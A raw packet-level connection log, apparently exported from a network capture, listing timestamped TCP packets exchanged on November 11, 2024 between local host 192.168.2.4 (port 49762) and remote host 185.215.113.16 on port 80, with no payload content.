Nov 11, 2024 01:14:22.369144917 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.369151115 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.369172096 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.369214058 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.369853020 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.369869947 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.369883060 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.369895935 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.369903088 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.369914055 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.369916916 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.369956970 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.370651007 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.370696068 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.370724916 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.370764971 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.376854897 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.376873970 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.376888037 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.376898050 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.376934052 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.377043962 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.377077103 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.522963047 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.522989988 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.523020983 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.523034096 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.523161888 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.523185968 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.523197889 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.523209095 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.523242950 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.523255110 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.523256063 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.523263931 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.523299932 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.523852110 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.523868084 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.523874044 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.523890018 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.523900986 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.523916960 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.523924112 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.523937941 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.523962021 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.524725914 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.524739981 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.524750948 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.524785042 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.524796963 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.524800062 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.524810076 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.524826050 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.524857998 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.525542021 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.525564909 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.525577068 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.525600910 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.525634050 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.525636911 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.525646925 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.525671959 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.525672913 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.525712967 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.525727987 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.526442051 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.526453972 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.526470900 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.526493073 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.526501894 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.526513100 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.526521921 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.526525974 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.526554108 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.526588917 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.527319908 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.527332067 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.527338028 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.527352095 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.527363062 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.527374029 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.527391911 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.527405024 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.528183937 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.528196096 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.528202057 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.528215885 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.528228045 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.528238058 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.528264046 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.644846916 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.644948959 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.678307056 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.678319931 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.678332090 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.678344011 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.678356886 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.678404093 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.678406954 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.678416014 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.678430080 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.678476095 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.678495884 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.678611040 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.678622961 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.678633928 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.678649902 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.678673983 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.678677082 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.678690910 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.678730011 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.678961039 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.678973913 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.678985119 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.678997040 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.679006100 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.679011106 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.679023981 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.679033995 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.679059029 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.679083109 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.679367065 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.679378033 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.679389954 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.679399967 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.679410934 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.679410934 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.679450989 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.679869890 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.679883003 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.679898977 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.679910898 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.679922104 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.679923058 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.679934978 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.679938078 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.679946899 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.679964066 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.679970980 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.679975986 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.679989100 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.680000067 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.680026054 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.680649042 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.680668116 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.680685997 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.680696011 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.680699110 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.680708885 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.680720091 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.680728912 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.680731058 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.680763006 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.680774927 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.680774927 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.680788040 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.680788040 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.680803061 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.680813074 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.680830002 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.680870056 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.681413889 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.681426048 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.681432962 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.681466103 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.681478024 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.681485891 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.681489944 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.681500912 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.681507111 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.681521893 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.681533098 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.681566954 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.683198929 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.683244944 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.683250904 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.683258057 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.683269024 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.683286905 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.683331966 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.683453083 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.683464050 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.683482885 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.683494091 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.683505058 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.683505058 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.683518887 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.683521986 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.683532000 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.683542967 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.683543921 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.683559895 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.683571100 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.683581114 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.683582067 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.683593988 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.683607101 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.683631897 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.684312105 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.684334040 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.684345961 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.684355974 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.684359074 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.684369087 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.684389114 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.684390068 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.684421062 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.684451103 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.684689999 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.684741974 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.684747934 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.684760094 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.684788942 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.684806108 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.684880972 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.684891939 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.684904099 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.684916973 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.684926987 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.684931040 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.684947968 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.684957027 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.684961081 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.684973001 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.684986115 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.684989929 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.685019970 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.685039043 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.766460896 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.766478062 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.766490936 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.766557932 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.766726971 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.811639071 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.811676979 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.811687946 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.811697960 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.811711073 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.811872005 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.811872005 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.833594084 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.833606958 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.833617926 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.833627939 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.833646059 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.833661079 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.833673000 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.833683014 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.833693981 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.833705902 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.833723068 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.833734035 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.833744049 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.833755016 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.833770990 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.833782911 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.833792925 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.833803892 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.833842039 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.833853006 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.833863974 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.833910942 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.833911896 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.833911896 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.833911896 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.833930969 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.833942890 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.833955050 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.833966970 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.833982944 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.833988905 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.833995104 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.834009886 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.834017992 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.834048986 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.834057093 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.834059954 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.834081888 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.834119081 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.834228992 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.834240913 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.834250927 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.834264040 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.834275007 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.834280014 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.834286928 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.834306002 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.834312916 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.834317923 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.834337950 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.834338903 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.834351063 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.834362030 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.834362984 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.834373951 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.834386110 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.834403038 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.834418058 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.834434032 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.834438086 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.834445953 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.834458113 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.834480047 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.834512949 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.834513903 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.834525108 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.834536076 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.834547043 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.834563017 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.834572077 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.834594965 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.834614038 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.834676027 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.834686041 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.834697008 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.834708929 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.834718943 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.834722042 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.834748983 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.834759951 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.834769011 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.834773064 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.834777117 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.834785938 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.834799051 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.834805012 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.834831953 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.834858894 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.834877014 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.834888935 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.834901094 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.834920883 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.834954023 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.834989071 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.835000992 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.835011959 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.835022926 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.835036993 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:22.835052013 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:22.835063934 CET	80	49762	185.215.113.16	192.168.2.4
